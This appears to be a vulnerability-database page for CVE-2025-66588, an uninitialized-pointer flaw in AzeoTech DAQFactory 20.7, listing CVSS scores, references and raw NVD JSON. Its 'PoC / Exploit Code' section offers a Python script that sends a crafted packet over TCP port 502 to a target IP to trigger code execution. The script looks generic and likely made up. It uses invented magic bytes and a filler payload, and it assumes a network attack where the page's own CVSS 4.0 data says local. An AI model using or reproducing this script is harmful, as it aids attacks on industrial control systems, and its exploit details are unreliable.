CVE-2025-66588

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Uninitialized Pointer vulnerability can be exploited by an attacker which can lead to arbitrary code execution.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE

AzeoTech DAQFactory 20.7 (Build 2555)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66588 PoC - AzeoTech DAQFactory Uninitialized Pointer
# Target: AzeoTech DAQFactory 20.7 (Build 2555)
# Vulnerability: Access of Uninitialized Pointer leading to RCE

import socket
import struct
import time

def create_exploit_packet():
    """Generate packet to trigger uninitialized pointer access"""
    # DAQFactory default port
    header = b'\x44\x46\x43\x54'  # 'DFCT' magic bytes
    version = struct.pack('<H', 2070)  # Version 20.7
    
    # Trigger uninitialized pointer through specific request
    cmd_type = struct.pack('<I', 0x15)  # Specific command type
    payload_size = struct.pack('<I', 256)
    
    # Malformed data to trigger the vulnerability
    payload = b'\x41' * 256
    
    packet = header + version + cmd_type + payload_size + payload
    return packet

def exploit_daqfactory(target_ip, target_port=502):
    """Send exploit to DAQFactory service"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Send exploit packet
        packet = create_exploit_packet()
        sock.send(packet)
        
        # Wait for response
        response = sock.recv(1024)
        print(f"Received response: {response.hex()}")
        
        sock.close()
        return True
    except Exception as e:
        print(f"Exploit failed: {e}")
        return False

if __name__ == "__main__":
    # Target configuration
    target = "192.168.1.100"
    exploit_daqfactory(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66588
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66588
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66588/
[4] VulDB https://vuldb.com/cve/CVE-2025-66588
[5] https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66588", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:57.907", "lastModified": "2026-01-02T20:08:22.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), an Access of Uninitialized Pointer vulnerability can be exploited by an attacker which can lead to arbitrary code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}